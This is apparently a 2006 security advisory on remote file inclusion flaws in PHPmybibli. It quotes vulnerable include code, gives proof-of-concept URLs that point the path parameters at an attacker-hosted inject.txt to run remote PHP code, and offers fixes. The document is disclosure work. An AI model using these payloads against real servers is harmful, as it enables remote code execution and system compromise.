ECHO_ADV_55$2006 ----------------------------------------------------------------------------------------------- [ECHO_ADV_55$2006]Phpmybibli <=2.1 Multiple Remote File Inclusion Vulnerability ----------------------------------------------------------------------------------------------- Author : Dedi Dwianto a.k.a the_day Date Found : October, 17th 2006 Location : Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv55-theday-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : PHPmybibli version : <=2.1 URL : http://www.pizz.net/ --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~~ I found vulnerability script cart.php --------------------------cart.php--------------------------------------- .... <? include_once("$include_path/cart.inc.php"); include_once("$include_path/templates/cart.tpl.php"); include_once("$include_path/isbn.inc.php"); include_once("$include_path/expl_info.inc.php"); include_once("$include_path/bull_info.inc.php"); include_once("$include_path/notice_authors.inc.php"); include_once("$include_path/notice_categories.inc.php"); include_once("$include_path/explnum.inc.php"); include_once("$class_path/cart.class.php"); include_once("$class_path/caddie.class.php"); include_once("$class_path/author.class.php"); include_once("$class_path/collection.class.php"); include_once("$class_path/subcollection.class.php"); include_once("$class_path/mono_display.class.php"); include_once("$class_path/serie.class.php"); include_once("$class_path/serial_display.class.php"); include_once("$class_path/serials.class.php"); include_once("$class_path/editor.class.php"); require_once("$class_path/emprunteur.class.php"); require_once("$javascript_path/misc.inc.php"); ... ---------------------------------------------------------- Input passed to the "$include_path" parameter in cart.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources. Also affected files on Files: edit.php circ.php index.php select.php etc.. Proof Of Concept: ~~~~~~~~~~~~~~~ http://target.com/[phpmybibli_path]/index.php?class_path=http://attacker.com/inject.txt? http://target.com/[phpmybibli_path]/edit.php?javascript_path=http://attacker.com/inject.txt? http://target.com/[phpmybibli_path]/circ.php?include_path=http://attacker.com/inject.txt? Solution: ~~~~~~~ - Sanitize variable $class_path,$javascript_path,$include_path on affected files. - Turn off register_globals --------------------------------------------------------------------------- Shoutz: ~~~ ~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous ~ Jessy My Brain ~ az001,bomm_3x,matdhule,angelia ~ newbie_hacker@xxxxxxxxxxxxxxx ~ #aikmel - #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~ EcHo Research & Development Center the_day[at]echo[dot]or[dot]id -------------------------------- [ EOF ]----------------------------------
